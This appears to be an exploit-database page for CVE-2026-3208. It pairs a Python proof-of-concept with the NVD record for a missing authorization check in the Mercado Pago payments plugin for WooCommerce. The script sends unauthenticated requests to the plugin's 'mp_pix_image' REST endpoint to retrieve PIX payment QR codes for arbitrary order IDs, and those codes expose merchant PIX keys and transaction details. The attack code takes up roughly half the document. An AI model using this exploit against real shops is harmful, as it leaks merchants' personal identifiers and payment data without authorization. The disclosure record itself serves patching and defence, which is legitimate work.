CVE-2026-3208

import requests # Sample POC to demonstrate unauthorized access to PIX QR code # Usage: python poc.py <target_url> <order_id> def exploit(target_url, order_id): # The vulnerable endpoint is usually registered under the WooCommerce API namespace # Based on the plugin source (PixGateway.php), the route might be structured like this. # Adjust the endpoint path if the specific route prefix differs. endpoint = f"{target_url}/wp-json/wc/v3/mp_pix_image" # Parameters required to fetch the QR code for a specific order params = { 'order_id': order_id } try: # Send GET request without authentication headers response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Success! Retrieved data for Order ID: {order_id}") print("[+] Content-Type:", response.headers.get('Content-Type')) # Assuming the response is the image data (binary) # In a real scenario, save this to a file and scan with a QR reader print(f"[+] Data length: {len(response.content)} bytes") print("[+] Response content preview (first 100 bytes):", response.content[:100]) elif response.status_code == 401 or response.status_code == 403: print(f"[-] Failed: Access denied. The target might be patched.") else: print(f"[-] Failed: HTTP {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Example usage target = "http://example.com" oid = "123" exploit(target, oid)

{"cve": {"id": "CVE-2026-3208", "sourceIdentifier": "[email protected]", "published": "2026-05-06T04:16:06.223", "lastModified": "2026-05-06T13:06:42.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Mercado Pago payments for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'mp_pix_image' WooCommerce API endpoint in all versions up to, and including, 8.7.11. This makes it possible for unauthenticated attackers to retrieve PIX payment QR code images for arbitrary orders. PIX QR codes contain sensitive merchant information including PIX keys (which may be CPF/CNPJ personal identifiers), transaction amounts, merchant name and city, and MercadoPago transaction references."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L358", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-mercadopago/tags/8.7.10/src/Gateways/PixGateway.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fwoocommerce-mercadopago/tags/8.7.11&new_path=%2Fwoocommerce-mercadopago/tags/8.7.12", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/986e0252-b94d-4ac8-9083-0218fa8a651e?source=cve", "source": "[email protected]"}]}}